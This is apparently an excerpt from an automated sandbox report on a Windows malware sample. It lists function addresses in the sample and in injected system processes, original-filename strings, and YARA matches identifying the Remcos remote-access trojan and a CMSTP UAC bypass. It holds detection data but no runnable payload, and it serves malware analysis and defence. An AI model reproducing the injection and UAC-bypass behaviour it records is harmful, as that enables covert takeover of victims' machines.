Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A8D800 0_2_02A8D800
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A7FD80 0_2_02A7FD80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02806270 8_2_02806270
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_028133AB 8_2_028133AB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027FE34B 8_2_027FE34B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F706A 8_2_027F706A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027D4005 8_2_027D4005
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_028141D9 8_2_028141D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027FE11C 8_2_027FE11C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F81E8 8_2_027F81E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DF18B 8_2_027DF18B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F87F0 8_2_027F87F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027E742E 8_2_027E742E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F7566 8_2_027F7566
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027FE5A8 8_2_027FE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027E7AD7 8_2_027E7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0280DA49 8_2_0280DA49
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DDBF3 8_2_027DDBF3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F797E 8_2_027F797E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F39D7 8_2_027F39D7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027FDEED 8_2_027FDEED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F5EEB 8_2_027F5EEB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027E6E9F 8_2_027E6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027E7C40 8_2_027E7C40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F7DB3 8_2_027F7DB3
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 10_2_02A220C4 10_2_02A220C4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_02806270 11_2_02806270
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_028133AB 11_2_028133AB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027FE34B 11_2_027FE34B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F706A 11_2_027F706A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027D4005 11_2_027D4005
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_028141D9 11_2_028141D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027FE11C 11_2_027FE11C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F81E8 11_2_027F81E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027DF18B 11_2_027DF18B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F87F0 11_2_027F87F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027E742E 11_2_027E742E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F7566 11_2_027F7566
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027FE5A8 11_2_027FE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027E7AD7 11_2_027E7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0280DA49 11_2_0280DA49
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027DDBF3 11_2_027DDBF3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F797E 11_2_027F797E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F39D7 11_2_027F39D7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027FDEED 11_2_027FDEED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F5EEB 11_2_027F5EEB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027E6E9F 11_2_027E6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027E7C40 11_2_027E7C40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F7DB3 11_2_027F7DB3
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029A20C4 12_2_029A20C4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02846270 13_2_02846270
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028533AB 13_2_028533AB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0283E34B 13_2_0283E34B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02814005 13_2_02814005
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0283706A 13_2_0283706A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0281F18B 13_2_0281F18B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028541D9 13_2_028541D9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028381E8 13_2_028381E8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0283E11C 13_2_0283E11C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028387F0 13_2_028387F0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0282742E 13_2_0282742E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0283E5A8 13_2_0283E5A8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02837566 13_2_02837566
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02827AD7 13_2_02827AD7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0284DA49 13_2_0284DA49
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0281DBF3 13_2_0281DBF3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028339D7 13_2_028339D7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0283797E 13_2_0283797E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02826E9F 13_2_02826E9F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02835EEB 13_2_02835EEB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0283DEED 13_2_0283DEED
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02827C40 13_2_02827C40
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02837DB3 13_2_02837DB3
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: String function: 029C4500 appears 33 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: String function: 029C4860 appears 949 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: String function: 02A7C400 appears 45 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: String function: 029D89D0 appears 45 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: String function: 029C46D4 appears 244 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: String function: 029D894C appears 56 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: String function: 029C44DC appears 74 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027C1FAB appears 38 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027C20DF appears 40 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0280854A appears 36 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 02805951 appears 56 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027C46F7 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 02817AA8 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027C2213 appears 38 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027D1FA2 appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027C417E appears 46 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027C52FD appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027F4801 appears 82 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027C2093 appears 100 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027C1E65 appears 68 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 027F4E70 appears 108 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02801E65 appears 34 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02834801 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02802093 appears 50 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02834E70 appears 54 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: String function: 029A46D4 appears 155 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: String function: 029B894C appears 50 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: String function: 02A246D4 appears 155 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: String function: 02A24860 appears 683 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: String function: 029A4860 appears 683 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: String function: 02A3894C appears 50 times
Source: D2pQ4J4GGZ.exe Binary or memory string: OriginalFilename vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2175474410.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.0000000021833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FD2F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.0000000021862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
